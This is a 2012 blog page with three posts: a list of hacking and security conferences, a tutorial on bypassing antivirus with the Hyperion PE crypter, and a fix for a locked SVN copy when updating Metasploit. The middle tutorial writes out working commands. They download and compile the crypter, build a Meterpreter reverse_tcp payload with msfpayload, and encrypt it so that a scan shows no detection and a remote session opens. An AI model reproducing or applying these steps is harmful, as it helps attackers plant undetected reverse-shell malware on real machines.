Thursday, 15 November 2012

List of All Popular Hacking and Security Conferences by Shubham Mittal (@k@ Upgoingstaar)


I was just wondering around to have a look on the most famous conferences for Hackers and when i got to know about so many people and groups running these motivating communities, I set up myself for listing nearly all HACKERS conferences happening here and there. I might have missed some conferences and if yours is not on the list, I am sorry about it. Please let me know about yours so that I can include it too.

1. DefCon

DEF CON holds the title of world's largest annual hacker convention. It was first held in Las Vegas, NV in 1993 and continues today. Attendees include a wide range of personalities interested in the hacking world, general interest groups, federal government employees, lawyers, and hackers. Its focus ranges from computer and hacking related subjects, social events, and contests such as creating the longest Wi-Fi connection to  cracking computer systems to non-related computer contests. The best known contest is Capture the Flag where teams of hackers attempt to attack and defend computers and networks.

Official Website: https://www.defcon.org/

2. Black Hat

The Black Hat Briefings is a computer security conference that brings together a variety of people interested in information security. Representatives of federal agencies and corporations attend along with hackers.

Black Hat is composed of two major sections, the Black Hat Briefings, and Black Hat Trainings. Training is offered by various Computer security vendors, in effort to keep the conference vendor-neutral. In the past, the conference has hosted the National Security Agency's Information Assurance Manager course, and various courses by Cisco SystemsOffensive Security, and others.

Official Website: http://www.blackhat.com/

3. DerbyCon

At DerbyCon security professionals from all over the world come to hang out. Next DerbyCon 2.0 will is going to held this September 27-30th, 2012. They had pulled in over as much as 1,100 people with an amazing speaker lineup and a family-like feel. Their basic goal is to keep it around the same size and maintain a close-knit conference where they can all come together to learn and share ideas.


4. NullCon
















Null is an open source community full of Security Professionals who love to share their knowledge with means of various monthly meets, seminars and conferences. In India, they are the biggest Security community with chapters in 7 major cities. Nullcon Security Conferences is an Initiative by Null - The Open Source
Community. It Is Moreover is a unique platform for security companies/evangelists to showcase their research and technology. Nullcon hosts Prototype, Exhibition, Trainings, Free Workshops, null Job Fair at the conference.

Official Website: http://nullcon.net


5. ShmooCon


ShmooCon is an American hacker convention organized by The Shmoo Group. There are typically about 35 different talks and presentations, on a variety of subjects related to computer security and cyberculture.

Official Website: http://www.shmoocon.org/







6. OWASP



OWASP also conducts its annual international information security conference, and the last one was OWASP InfoSec India Conference 2012 - "India's Cyber Security Kumbh", which was held from August 24-25, 2012 in Delhi NCR, India.
OWASP events in India have become a distinguished platform to bring industry leaders, InfoSec professionals, developers, regulators and high-profile officials from defence and security establishments together from around the world.



7. ClubHack

They started in 2007 conducting and witnessing a lot of action with their aim of making the genera people including media and professionals more aware and serious about Security.



Official Website: http://www.clubhack.com/





8. HITB




Official Website: http://conference.hitb.org/

9. HOPE

HOPE (abbreviation of Hackers on Planet Earthconference series is sponsored by the hacker magazine 2600: The Hacker Quarterly and typically held at "Hotel Pennsylvania", in Manhattan, New York City. Held biennially in the summer, there have been nine conferences to-date; the most recent occurring 13–15 July 2012.



The "Last HOPE" took place 18–20 July 2008 at the Hotel Pennsylvania.The name referred to the expectation that this would be the final H.O.P.E. conference due to the scheduled demolition of its venue, the Hotel Pennsylvania. The "Next HOPE" was scheduled for Summer 2010. At the closing ceremony it was revealed that the use of the word "last" could also refer to the previous event, or one that had ended (referring to The Last HOPE itself).


Official Website: http://www.hope.net/


10. Malcon

MALCON is an annual information security conference focusing exclusively on malware. They aims for bringing together the Malware and InfoSec researchers from the world to share key research insights into building and containment of the next generation malwares. The first MalCon conference took place in December 2010 at Mumbai and Pune, India. They have their audience in Security Professionals, Government Employees, lawyers, journaalists and hackers with interest in malwarism.

Official Website: http://www.malcon.org/

11. SummerCon

Summercon is one of the oldest hacker conventions, and the longest running such conference in America. It helped set a precedent for more modern "cons" such as H.O.P.E. and DEF CON, although it has remained smaller and more personal. Summercon has been hosted in cities such as Pittsburgh, St. Louis, Atlanta, Washington, D.C., Austin, Las Vegas, and Amsterdam. Originally run by Phrack, the underground ezine, and held annually in St. Louis, the organizational responsibilities of running Summercon were transferred to clovis in 1998 and the convention took place in Atlanta, dubbed 'Summercon X'.


Official Website: http://www.summercon.org/

12. SourceConference

SOURCE Conference is the world's premier conference and training event to focus on bringing together the business and technical communities. At SOURCE, technical experts publish advanced research and network for job opportunities, while executives keep up with the technology that shapes their important decisions. Both leave SOURCE with an understanding of each other's perspectives on the critical security problems that face the world.




13. Hacker Halted

A complete and comprehensive conference workshop that educates and equips its participants with the in-depth knowledge of understanding vulnerabilities and countermeasures to overcome the security infringements present today.This conference is a global series of Computer and Information Security conferences presented by EC-Council. The objective of the Hacker Halted conferences is to raise international awareness towards increased education and ethics in IT Security. The event is currently in its 14th year. Also present at Hacker Halted is EC-Council's H@cker Halted | Academy, trainings and workshops led by EC-Council instructors and trainers.

Official Website: http://www.hackerhalted.com/

14. PhreakNIC

PhreakNIC is an annual hacker and technology convention held in Nashville, Tennessee. It is organized by the Nashville 2600 Organization and draws upon resources from SouthEastern 2600 (se2600).



PhreakNIC continues to be a long-time favorite among hackers, security experts and technology enthusiasts. PhreakNIC currently holds claim as the oldest regional hacker con and is one of the few hacker cons run by a tax-free charity

PhreakNIC is attended by hackers and other technology enthusiasts from across the United States, although, as a regional conference, most of its attendees come from a two-state radius around Tennessee, including groups from MissouriOhioWashington, DCGeorgiaKentucky, and Alabama.

Official Site: http://phreaknic.info/

15. KiwiCon

Kiwicon provides a venue for hackers and computer security professionals as well as other interested parties to get together and share knowledge, war stories and to consume a startling amount of beer. In the spirits of H.O.P.E. and DEFCON, Kiwicon intends to bring together the best and brightest from academia, the computer security industry, the hacker underground, those who manage critical infrastructure and law enforcement.
The conference format allows for talks of various lengths on a wide range of subjects of interest, informal discussions, socialising and competitions. In the past there has been free coffee, free breakfast, and always a healthy amount of free beer.


Official Website: https://www.kiwicon.org/


16. InfiltrateCon

Infilterate is the first depp technical conference by Immunity which focuses on entirely technical issues. This conference is more focused towards those who have their excellent minds always working in offensive security issues. No policy or high-level presentations, just hard-core thought provoking technical meat. World-renowned researchers focused on the latest technical issues will do the presentations – demonstrating techniques you can’t learn about anywhere else. In order to keep Infiltrate accessible, we are limiting attendance to 100 attendees.


Official Website: http://infiltratecon.net/

17. SANS

SANS is the most trusted and by far the largest source for information security training in the world. They offer training through several delivery methods - live & virtual conferences, mentors, online, and onsite.


Official Website: http://www.sans.org/


18. HackBattle


This time the Hack Battle is fully integrated in the TNW2012 Conference ending with the grand finale of the Hack Battle presentations on stage during the Conference.
The TNW Kings of Code Hack Battle brings world leading platforms (API's and SDK's) together with an exclusive international group of coders (frontend and backend developers and designers).

19. LayerOne

LayerOne is a computer security conference located in Anaheim, California. They have been eight years old in the market and they feature speakers from all across the globe. The topics these guys covers range from lockpicking and MPLS security to covert data gathering and HIPAA compliance. This is due to fact that the spekers here come from a diverse background and include a focus not just on the nuts and bolts of technology but the social impact as well. 


Official Website: http://www.layerone.org



20. PacSec

The PacSec meeting provides an opportunity for foreign specialists to be exposed to Japanese innovation and markets and collaborate on practical solutions to computer security issues. In a relaxed setting with a mixture of material bilingually translated in both English and Japanese, the eminent technologists can socialize and attend training sessions.

The presenters are experienced security professionals at the vanguard of leading information security technology as well as experienced instructors who have prepared tutorials intended to help you stay abreast of the latest developments in this rapidly moving technological field. The best, and brightest, have assembled unique new material to help you maintain your technological leadership - which they will present at this conferences.
Official Website: http://pacsec.jp/

21. SecTor



SecTor was founded on a passion for security and it doesn’t take long to realize that security extends far beyond the bits and bytes.  They assure to ensure that they will provide quality content – current information you can’t get anywhere else.   The same rigor and dedication that their advisors apply to the selection of the technical content is also invested in selecting the management track session. Marketing fluff is not allowed or tolerated.  Their conferences includes latest research, approaches, trends, Privacy and Compliance Issues, networking stuff, purist approach and experts from around the world.


Official Website: http://www.sector.ca/

22. NotaCon
File:Notaconlogo.png

NOTACON is an annual event that focuses on people who like to build, make, break and hack stuff. For many, it is a different kind of conference experience, while maintaining some familiar aspects of other hacker conferences. Showcasing: technologies, philosophy and creativity often overlooked at other events.



Official Website: http://www.notacon.org/




23. United Security Summit

The UNITED ("Using New Ideas to Empower Defenders") Security Summit is the venue for innovation and collaboration in the security community. At UNITED, security professionals engage in straight talk, share actionable advice and debate issues. This year's theme, "Truth, Lies & Decisions: moving forward in an insecure world," continues the tradition. They target their audience in IT Security directors, managers, architects, practitioners,Analysts, etc.

Official Website: http://www.unitedsummit.org

24. HacKid
HacKid is a new kind of conference focused on providing an interactive, hands-on experience for the entire family — kids aged 5-17 & their parents — in order to raise awareness, excitement and understanding of technology, gaming, mathematics, safety, privacy, networking, security and engineering and their impact on society and culture.



25. Athcon
AthCon is an annual, European two-day conference targeting particular areas of information security. It’s aim: to bring leading information security experts together. Attacking techniques of exploitation and various forms of penetration testing have become an important component of any organisation. This conference aims to provide a venue for understanding the ever evolving changes as well as new threats.

Official Website: http://athcon.org/

So for any instance you want to attend a conference, or speak something of your own stuffz, or play the CTF, look around these conferences and keep exploiting around.

Bypassing Antivirus with PE Crypters by Shubham Mittal (@k@ Upgoingstaar)

Well most of the time when we do penetration test, we are facing a super cool AV protection which stops us to execute our lovely EXEs, shellcodes, etc.

I was looking around the same and from a presentation of Mr. Dave Kennedy at DerbyCon, i got something quite useful. He used some words like "shellcodexec" and "PE crypters". On digging it here and there, i found that shellcodexec is a small utility to inject a Shellcode into any process and thus execute your malicious intentions. This is done with approach that when there is no file at all, what signature will AVs match? However shellcodexec is itself getting caught nowadays and therefore I will not suggest you to go for it.

On the other hand, PE Crypters (from Nullsecurity team) will encrypt a Binary file with a sexy crypting approach and thus can be used to bypass the AV.The whole project is running under the name of HYPERION project and is a proper working way to mess around with AVs. So lets start.

Well there has been great stuff for AVs detecting the templates with which we encrypt our EXE and likely the decryption approach of the program to reach the actuall offset, AVs started doing the same with the result of "Detection". In this PE Cryters, payload is not scrambled, instead it is encapsulated. A different key as a cipher is used every time and at the time of execution, Brute Force can be done. So it will take time, huh? Well yeah it will take time if our key is long. We will keep our key short and everything will go fine. This is whot Hyperion Pe Crypters will do; in short. A weak 128 bit AES key is used to encapsulate the packet which is simply brute forced at the time of execution. If you want to give it a hardcore look, check out this research paper (http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf)

Anyways, for super cool guys, this was enough. But as only the Source files are available by now, For those who are new to these things, that can be a little troublesome :P; Well let me give a go through. First of all choose your platform; M preferring Linux all the way but its your system, and your choice too.

Next Download the project;
or use: wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip



















Uzip It.

unzip Hyperion-1.0.zip
























Change the directory, and compile it.

cd Hyperion-1.0.zip


wine /root/drive_c/MinGW/bin/g++  Src/Crypter/*.cpp -o shubham.exe



Once you have created executable for Crypting, shubham.exe in this case, you can start playing around with EXEs. I am creating a msfpayload for reverse connection and once it is crypted using Hyperion, it must bypass AV along with sending back the reverse connection.

Create the Payload.4
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 X > msf1.exe





Scan it. 
Once the payload is ready, we will scan it first (without crypting).






Lets Crypt it with Hyperion.

wine shubham.exe /root/Desktop/msf1.exe /root/Desktop/msf2.exe


ls -l





Scan it.
No Detection






Execute it.
As soon as you will execute it, it will start brute forcing which will make the CPU Usage 100%.





Enjoy It.
As soon as the brute force will get over, CPU Usage will reduce to normal and a session will get generated.







I hope this was OKAY for you and you enjoyed it. My next post will be about another way to Bypass Antiviruses.

Stay Focused; & Keep exploiting. :)

MSF not updating : Working Copy '.' Locked. Suggestion for SVN

Welcome Friends, I Am Posting A New Tutorial by Shubham Mittal(@k@ upgoingstaar) and his Blog(Must read) 
http://3ncrypt0r.blogspot.in/
So Get Ready To Be A G33k With Him. Enjoy Tutorial...


 Most of the time when we come across some new exploits in the market and expect them in our msf instance, your framework stucks at some point while updating and you have a reason for your dissappointment. You try with some Googling but it doesnt help you as most of the prople instead of answering, are fighting, arguing and posting lame things on those forums.

To solve this for newbies, I am therefore writing this article, hwoever if you enjoy digging the things on your own (which is the best practice to make you strong conceptually, learnt this one of highly experienced senior), this is not for you.

There can be lot of reasons for not being able to update msf. One of them i included in my last post, 

http://3ncrypt0r.blogspot.in/2012/08/msfupdate-not-working-solution.html

The other one i am including today.

generally when we do update we have to sit long back to back as the update stucks, it comes back with error which seems something like this when you run msfupdate.

svn : Working copy '.' locked
svn : run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)

IMAGES ARE SMALL IN VIEW; CLICK THEM FOR LARGER VIEW.






Reason: SVN not being able to handle the situation. 

What is SVN? 

SVN is a program which keeps track of all the different versions of our source files. You can give a read to it on this Wiki page.


Solution: 

It tries to resolve the issue on its own and suggest you to run "cleanup" at the directory which is getting locked. If it works, Congratulations". In most of the cases it will not work and you will see something like this:



In my case i was getting the error at "/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.8/lib/active_support" directory. 


I guessed it was getting locked at some file within the directory but as the files don't appear in the folder when it is bieng synchronized with git, so you can't delete that particular file. Better remove the directory itself. So i deleted my that particular directory:




I was a bit unlucky that day so it didnt solved the situation. But as we must leave the things unsolved go through the error and and try to figure it out. Again it was locked at some other directory : 




So without any laziness, delete it too.




As a precaution to avoid further error messages (I HATE ERRORS, seriously), so run this:




Most probably you have figured it out, so try msfupdate now.



And perhaps this will give you a smile.




Suggestions and queries are always welcomed.

KEEP EXPLOITING.